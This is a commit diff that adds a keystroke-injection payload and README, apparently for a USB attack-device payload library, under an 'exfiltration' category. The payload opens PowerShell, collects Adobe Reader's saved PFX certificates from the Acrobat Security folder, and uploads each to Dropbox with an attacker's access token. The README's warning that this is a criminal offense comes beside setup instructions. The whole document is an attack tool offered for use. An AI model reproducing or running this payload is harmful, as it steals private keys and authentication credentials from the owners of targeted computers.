Merge pull request #175 from aleff-github/patch-42

Export all saved certificates with Adobe Reader
2023-06-12 13:56:32 -04:00 · 2023-06-12 13:56:32 -04:00 · a135ad9274
parent 6f2628fa9e 612179f327
commit a135ad9274
2 changed files with 79 additions and 0 deletions
--- a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/README.md
+++ b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/README.md
@ -0,0 +1,24 @@
+# Export all saved certificates with Adobe Reader
+
+This script can be used to export all PFX certificates saved in plain text and without any protection from Adobe Reader.
+
+**Category**: Exfiltration
+
+## Description
+
+This script can be used to export all PFX certificates saved in plain text and without any protection from Adobe Reader.
+
+Open a PowerShell, go to Adobe Reader Path dinamically, then select all the pfx certificates, then set the exfiltration settings and export the certificates trough a foreach using Dropbox.
+
+**The unauthorized extraction of PFX certificates can be considered a criminal offense**. Taking possession of such certificates, which contain sensitive information such as private keys and critical authentication data, violates the owner's property rights.
+
+## Dependencies
+
+* Adobe Reader must be installed
+* Internet Connection
+
+## Settings
+
+- You must define your Dropbox accessToken or modify the exfiltration modality. Replace just the example word with your token.
+
+    `DEFINE DROPBOX_ACCESS_TOKEN "example"`
--- a/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
+++ b/payloads/library/exfiltration/Export_all_saved_certificates_with_Adobe_Reader/payload.txt
@ -0,0 +1,55 @@
+REM ####################################################################
+REM #                                                                  |
+REM # Title        : Export all saved certificates with Adobe Reader   |
+REM # Author       : Aleff                                             |
+REM # Version      : 1.0                                               |
+REM # Category     : Exfiltration                                      |
+REM # Target       : Windows 10-11                                     |
+REM #                                                                  |
+REM ####################################################################
+
+
+REM Requirements:
+REM     - Adobe Reader must be installed
+REM     - Internet Connection
+
+
+REM You must define your Dropbox accessToken or modify the exfiltration modality.
+DEFINE DROPBOX_ACCESS_TOKEN example
+
+
+GUI r
+DELAY 1000
+STRING PowerShell
+DELAY 2000
+
+REM Settings about Adobe Reader
+STRINGLN_BLOCK
+    $roamingFolderPath = [Environment]::GetFolderPath('ApplicationData')
+    $securityFolderPath = Join-Path -Path $roamingFolderPath -ChildPath 'Adobe\Acrobat\DC\Security'
+    $pfxFiles = Get-ChildItem -Path $securityFolderPath -Filter '*.pfx' -File
+END_STRINGLN
+
+REM Setting about exfiltration
+STRING $accessToken = "
+STRING DROPBOX_ACCESS_TOKEN
+STRING "
+ENTER
+
+STRINGLN_BLOCK
+    $authHeader = @{Authorization = "Bearer $accessToken"}
+
+    $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
+
+    foreach ($file in $pfxFiles) {
+        $dropboxFilePath = "/$file"
+        $headers = @{}
+        $headers.Add("Authorization", "Bearer $accessToken")
+        $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
+        $headers.Add("Content-Type", "application/octet-stream")
+
+        Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $file
+    }
+
+    exit    
+END_STRINGLN